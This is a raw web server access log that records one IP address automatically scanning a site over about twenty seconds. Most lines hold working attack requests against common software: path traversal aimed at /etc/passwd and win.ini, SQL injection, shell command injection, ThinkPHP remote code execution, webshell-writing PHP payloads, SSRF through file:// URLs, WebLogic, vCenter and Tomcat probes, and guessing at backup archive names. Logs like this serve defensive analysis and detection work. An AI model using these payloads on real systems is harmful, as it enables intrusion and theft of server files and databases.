[15/Jan/2025:00:02:56 -0500] "GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /web.config.i18n.ashx?l=en-US&v=943948465 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:56 -0500] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /solr/admin/cores?wt=json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /root.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /api/settings/values HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /cgi-bin/jarrewrite.sh HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /v1/submissions HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /seeyon/main.do HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "POST /php/ping.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23/a HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "POST / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "HEAD /actuator/heapdump HTTP/1.1" 200 - 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /a/b/%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc/resolv.conf HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:57 -0500] "GET /oauth/authorize?response_type=${44675*40891}&client_id=acme&scope=openid&redirect_uri=http://test HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /manage/log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /env HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /test/pathtraversal/master/..%252F..%252F..%252F..%252F..%252F..%252Fetc%252fpasswd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /1.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /public/index.php?s=/index/qrcode/download/url/L1dpbmRvd3Mvd2luLmluaQ= HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "POST / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /beifen.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /solr/admin/cores?indexInfo=false&wt=json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /swagger/ui/index HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /include/exportUser.php?type=3&cla=application&func=_exec&opt=(expr%20990034561%20%2B%20917199296)%3Eynvmwbmrew HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:58 -0500] "GET /include/makecvs.php?Event=http|echo%20""%20>>%20/usr/www/leequevwdn.php%20&&%20chmod%20755%20/usr/www/leequevwdn.php|| HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /api/ping?count=5&host=;echo%20$(expr%20950508510%20%2b%20910539588):950508510:950508510;&port=80&source=1.1.1.1&type=icmp HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /manager/index.php HTTP/1.1" 404 1586 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b2x322s2t3c1a342w34 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /?a=display&templateFile=README.md HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /log/view?filename=/windows/win.ini&base=../../../../../../../../../../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /actuator/env HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=printf&vars[1][]=a29hbHIgaXMg%25%25d2F0Y2hpbmcgeW91 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /index.php?a=fetch&content=%3C?php+file_put_contents(%2210948.php%22,%22%3C?php+echo+1402320814%3B%22)%3B HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /843033090.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /backup.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /swagger-ui.html HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /include/ynvmwbmrew HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /api/dbstat/gettablessize HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "POST /index.php?s=captcha HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:02:59 -0500] "GET /216.108.230.89.zip HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "PUT /yjpqeb.jsp/ HTTP/1.1" 405 1084 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /jkstatus; HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /tomcatwar.jsp?data=j&word=echo%20{r1} HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "POST /general/document/index.php/recv/register/insert HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /10948.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /manage/log/view?filename=/etc/hosts&base=../../../../../../../../../../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "POST /mobile/api/api.ali.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:00 -0500] "GET /general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /mobile/auth_mobi.php?isAvatar=1&uid=11121212121212&P_VER=0 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "POST /module/ueditor/php/action_upload.php?action=uploadfile HTTP/1.1" 200 2142 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /sql.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /api/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /database.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "POST /index.php?s=captcha HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /index.php/Home/uploadify/fileList?type=.+&path=../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /mobile/index/index2/id/1)%20and%20(select%201%20from%20(select%20count(*),concat(0x716b627671,(select%20md5(917877613)),0x716b627671,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)-- HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /Pages/login.htm HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "POST /install.php?finish HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "GET /ueditor/net/controller.ashx?action=catchimage&encode=utf-8 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:01 -0500] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "POST / HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1" 400 - 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /eam/vib?id=C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\vcdb.properties HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /ui/vropspluginui/rest/services/uploadova HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /log/view?filename=/etc/hosts&base=../../../../../../../../../../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /oarfmbzmpnls.txt HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /inc/package/work.php?id=../../../../../myoa/attach/approve_center/2501/%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E%3E.lrbvrmoh HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "POST /casa/nodes/thumbprints HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /www.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /data.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:02 -0500] "GET /service/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1" 200 2142 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "HEAD /console/j_security_check HTTP/1.1" 200 - 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "POST /_async/AsyncResponseService HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /eam/vib?id=/etc/passwd HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /console/images/%252E./console.portal HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "GET /uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700 HTTP/1.1" 404 1070 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "POST /password_change.cgi HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:03 -0500] "POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /public/index.php/home/index/bind_follow/?publicid=1&is_ajax=1&uid[0]=exp&uid[1]=)%20and%20updatexml(1,concat(0x7e,md5(209305077),0x7e),1)--+ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "POST /login.php?action=login&type=admin HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /wp-admin/admin.php?page=download_report&report=users&status=all HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /db_backup.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /wwwroot.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /web/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "POST /index.php?m=member&f=login_save HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "POST /wp-content/plugins/mailpress/mp-includes/action.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:04 -0500] "GET /api/sms_check.php?param=1%27%20and%20updatexml(1,concat(0x7e,(SELECT%20MD5(1234)),0x7e),1)--%20 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /install/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "POST /api/user/reg HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /admin/?a=Factory();print(862136852%2b997384114);//../ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "POST /Proxy HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "POST /Proxy HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "POST /servlet/FileReceiveServlet HTTP/1.1" 200 2142 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /public/index.php/home/file/user_pics HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /dbdump.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20md5(205283992)) HTTP/1.1" 404 1048 38.110.228.166 - - [15/Jan/2025:00:03:05 -0500] "GET /objects/getImage.php?base64Url=YGVjaG8gbnVxYXVta2MgPiB0ZXZhLnR4dGA%3D&format=png HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /swagger/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /index.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "POST /index.php HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /admin/cms_channel.php?del=123456+AND+(SELECT+1+FROM(SELECT+COUNT(*)%2cCONCAT(0x7e%2cmd5(202072102)%2c0x7e%2cFLOOR(RAND(0)*2))x+FROM+INFORMATION_SCHEMA.CHARACTER_SETS+GROUP+BY+x)a)--%2b HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /objects/getImageMP4.php?base64Url=YGVjaG8gdXFheml4ZmUgPiBpbnN6LnR4dGA%3D&format=jpg HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /objects/getSpiritsFromVideo.php?base64Url=YGVjaG8gdnJncHN1anggPiBzcHRwLnR4dGA%3D&format=jpg HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /?/member/cart/Fastpay&shopid=-1%20union%20select%20md5(2027811120),2,3,4%20--+ HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /zabbix.php?action=dashboard.view&dashboardid=1 HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5(2000861084)),0) HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "GET /cgi-bin/kerbynet?Action=x509view&Section=NoAuthREQ&User=&x509type=%27%0Aexpr%20811352101%20-%20886618335%0A%27 HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:06 -0500] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /_next/static/../server/pages-manifest.json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "POST /user/zs.php?do=save HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /11251.jsp HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /db.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /backup.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /objects/teva.txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /actuator/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /objects/insz.txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /objects/sptp.txt HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /dump.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /back.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /libs/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /user/zsmanage.php HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /login HTTP/1.1" 200 4254 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:07 -0500] "GET /216.108.230.89.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:08 -0500] "GET /data.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:08 -0500] "GET /template/swagger-ui.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:08 -0500] "GET /web.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:08 -0500] "GET /216.108.230.89_db.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:08 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:08 -0500] "GET /db.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /api_docs HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /database.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /localhost.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /ftp.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:09 -0500] "GET /api/docs/ HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /admin.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /mysqldump.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /api/index.html HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /upload.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:10 -0500] "GET /mysql.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /swagger/v1/swagger.yaml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /site.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /swagger/v1/swagger.json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /package.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:11 -0500] "GET /sql.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /swagger.yaml HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /temp.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /old.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /translate.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /swagger.json HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /test.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:12 -0500] "GET /users.sql HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:13 -0500] "GET /api-docs/swagger.yaml HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:13 -0500] "GET /api-docs/swagger.json HTTP/1.1" 200 2145 38.110.228.166 - - [15/Jan/2025:00:03:13 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:13 -0500] "GET /root.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:14 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:14 -0500] "GET /beifen.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:14 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:14 -0500] "GET /216.108.230.89.7z HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:15 -0500] "GET /manager/html HTTP/1.1" 401 2538 38.110.228.166 - - [15/Jan/2025:00:03:15 -0500] "GET /sql.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:15 -0500] "GET /www.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:16 -0500] "GET /wwwroot.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:16 -0500] "GET /index.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:17 -0500] "GET /backup.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:17 -0500] "GET /back.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:18 -0500] "GET /data.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:18 -0500] "GET /web.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:18 -0500] "GET /db.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:19 -0500] "GET /database.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:19 -0500] "GET /ftp.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:19 -0500] "GET /admin.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:20 -0500] "GET /upload.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:20 -0500] "GET /package.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:21 -0500] "GET /old.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:21 -0500] "GET /test.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:22 -0500] "GET /root.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:22 -0500] "GET /beifen.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:23 -0500] "GET /216.108.230.89.rar HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:23 -0500] "GET /sql.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:23 -0500] "GET /www.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:24 -0500] "GET /wwwroot.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:25 -0500] "GET /index.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:25 -0500] "GET /backup.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:25 -0500] "GET /back.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:26 -0500] "GET /data.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:26 -0500] "GET /web.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:26 -0500] "GET /db.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:27 -0500] "GET /database.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:27 -0500] "GET /ftp.gz HTTP/1.1" 302 - 38.110.228.166 - - [15/Jan/2025:00:03:28 -0500] "GET /admin.gz 